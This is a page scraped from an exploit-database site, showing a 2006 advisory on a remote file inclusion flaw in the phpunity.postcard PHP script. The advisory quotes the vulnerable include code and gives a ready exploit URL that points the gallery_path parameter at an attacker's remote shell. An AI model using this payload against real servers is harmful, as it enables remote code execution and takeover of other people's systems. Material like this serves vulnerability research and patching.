0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
phpunity.postcard (gallery_path) Remote File Include Vulnerability
================================================================== phpunity.postcard (gallery_path) Remote File Include Vulnerability ================================================================== ###################################################################################### # # # phpunity.postcard (phpunity-postcard.php) Remote File Inclusion Exploit # # # ###################################################################################### # # # Affected Software .: phpunity.postcard # # Vendor ............: http://www.perlunity.de/ # # Class .............: Remote File Inclusion # # Risk ..............: high (Remote File Execution) # # Found by ..........: Rivertam # # Contact ...........: rivertam88[at]gmail[.]com # # Discovered on .....: 04.09.2006 (dd.mm.yyyy) # # Published on ......: 13.09.2006 (dd.mm.yyyy) # # # ###################################################################################### # # # Affected File: # # /phpunity-postcard.php # # # # Vulnerable Code: # # if(isset($plgallery_epost)) { # # $keep_url = "?".$_SERVER['QUERY_STRING']; # # if(isset($gallery_path)) { # # include("$gallery_path/admin/inc/config.inc.php"); # # } else { # # include("../../phpunity-easygallery/admin/inc/config.inc.php"); # # } # # } # # # # Description: # # $gallery_path is not defined before being used and in the config it is # # standardly out-commentated. To get into the if request we must define # # $plgallery_epost as 1 (or somethings else) # # # ###################################################################################### # # # Exploit: # # http://[target]/phpunity-postcard.php?plgallery_epost=1&gallery_path=[shell]? # # # ###################################################################################### # # # Notice: # # Works not with the c99-php shell cause if you use it the plgallery_epost=1 # # getting lost when you change dir or make another action and then the shell # # unloads. # # # ###################################################################################### # # # Greets: Rivertam [National Cracker Crew] # # # ###################################################################################### # # # Greets to: # # Silver, DOOMER85, Betta splendens and Dye # # # ###################################################################################### # 0day.today [2024-12-24] #